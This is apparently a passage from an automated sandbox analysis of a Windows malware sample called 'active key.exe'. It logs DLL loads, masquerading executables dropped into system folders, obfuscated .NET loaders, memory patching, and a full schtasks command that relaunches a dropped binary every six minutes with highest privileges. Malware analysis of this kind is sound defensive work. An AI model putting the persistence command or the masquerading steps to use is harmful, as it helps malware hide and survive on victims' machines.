                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: mscoree.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: apphelp.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: version.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: uxtheme.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: wldp.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: amsi.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: userenv.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: profapi.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: windows.storage.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: cryptsp.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: rsaenh.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: apisethost.appexecutionalias.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: version.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: winmm.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: winmmbase.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mmdevapi.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: devobj.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ksuser.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: avrt.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: audioses.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: msacm32.dll
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: midimap.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: mscoree.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: apphelp.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: version.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: wldp.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: amsi.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: userenv.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: profapi.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Users\user\Desktop\active key.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\System32\ntoskrnl2.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\7a0fd90576e088
                    Source: active key.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: active key.exeStatic file information: File size 4691456 > 1048576
                    Source: active key.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x45b600
                    Source: active key.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: ntoskrnl2.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.active key.exe.7ff6e95fd820.2.raw.unpack, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: XUkPLaESKIkbWXdxlvmVntDv.exe.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: XUkPLaESKIkbWXdxlvmVntDv.exe0.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: fontdrvhost.exe.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: explorer.exe.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: backgroundTaskHost.exe.5.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
                    Source: active key.exeStatic PE information: section name: .vmp0
                    Source: active key.exeStatic PE information: section name: .vmp1
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD342F50C0 push esp; iretd 5_2_00007FFD342F50C3
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD342F00BD pushad ; iretd 5_2_00007FFD342F00C1
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD342F3BB8 push esp; retf 5_2_00007FFD342F3BB9
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD346CD0DB push edi; ret 5_2_00007FFD346CD0DC
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD346CD3D0 push 00000054h; ret 5_2_00007FFD346CD3D4
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD346CD43D push esp; ret 5_2_00007FFD346CD43E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD341FD2A5 pushad ; iretd 28_2_00007FFD341FD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD343E2316 push 8B485F91h; iretd 28_2_00007FFD343E231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD341DD2A5 pushad ; iretd 29_2_00007FFD341DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342F00BD pushad ; iretd 29_2_00007FFD342F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD343C2316 push 8B485F93h; iretd 29_2_00007FFD343C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD341DD2A5 pushad ; iretd 32_2_00007FFD341DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F00BD pushad ; iretd 32_2_00007FFD342F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342FC2C5 push ebx; iretd 32_2_00007FFD342FC2DA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD343C2316 push 8B485F93h; iretd 32_2_00007FFD343C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD341ED2A5 pushad ; iretd 34_2_00007FFD341ED2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD3430C2C5 push ebx; iretd 34_2_00007FFD3430C2DA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD341DD2A5 pushad ; iretd 36_2_00007FFD341DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD342F00BD pushad ; iretd 36_2_00007FFD342F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343C2316 push 8B485F93h; iretd 36_2_00007FFD343C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343C3580 pushad ; retf 36_2_00007FFD343C3581
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD341DD2A5 pushad ; iretd 37_2_00007FFD341DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F00BD pushad ; iretd 37_2_00007FFD342F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C2316 push 8B485F93h; iretd 37_2_00007FFD343C231B
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeCode function: 42_2_00007FFD342E50C0 push esp; iretd 42_2_00007FFD342E50C3
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeCode function: 42_2_00007FFD342E3BB8 push esp; retf 42_2_00007FFD342E3BB9
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeCode function: 43_2_00007FFD343150C0 push esp; iretd 43_2_00007FFD343150C3
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeCode function: 43_2_00007FFD34313BB8 push esp; retf 43_2_00007FFD34313BB9
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 48_2_00007FFD342F50C0 push esp; iretd 48_2_00007FFD342F50C3
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 48_2_00007FFD342F00BD pushad ; iretd 48_2_00007FFD342F00C1
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 48_2_00007FFD342F3BB8 push esp; retf 48_2_00007FFD342F3BB9
                    Source: 5.2.ntoskrnl2.exe.1b180000.4.raw.unpack, nJ93tM7rpkcHk5DHEWo.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'XXwHG7MQfps', 'q5AH7HW07p6', 'HAEwT2HgrR0iKI5jLw2B', 'KcN1vGHgu1ln4yZJVNBV', 'JA4ZHaHgd6HqaAKtdjsV', 'GHJugNHgoE38HafrbQHE', 'teddUMHgQ2leu6OG1jP4'

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                    Source: unknown Executable created and started: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: C:\Users\user\Desktop\active key.exe Executable created and started: C:\Windows\System32\ntoskrnl2.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\user\Desktop\DnHERPdP.log
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\user\Desktop\ZHsakaRB.log
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\Public\Pictures\backgroundTaskHost.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\user\Desktop\mlzPodne.log
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Windows\tracing\fontdrvhost.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\user\Desktop\aAtQiRdB.log
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\user\Desktop\hCHhiobl.log
                    Source: C:\Users\user\Desktop\active key.exe File created: C:\Windows\System32\ntoskrnl2.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\user\Desktop\UZXJUHSP.log

                    Boot Survival

                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Users\user\Desktop\active key.exe Memory written: PID: 6424 base: 7FFDB4590008 value: E9 EB D9 E9 FF
                    Source: C:\Users\user\Desktop\active key.exe Memory written: PID: 6424 base: 7FFDB442D9F0 value: E9 20 26 16 00
                    Source: C:\Users\user\Desktop\active key.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\ntoskrnl2.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
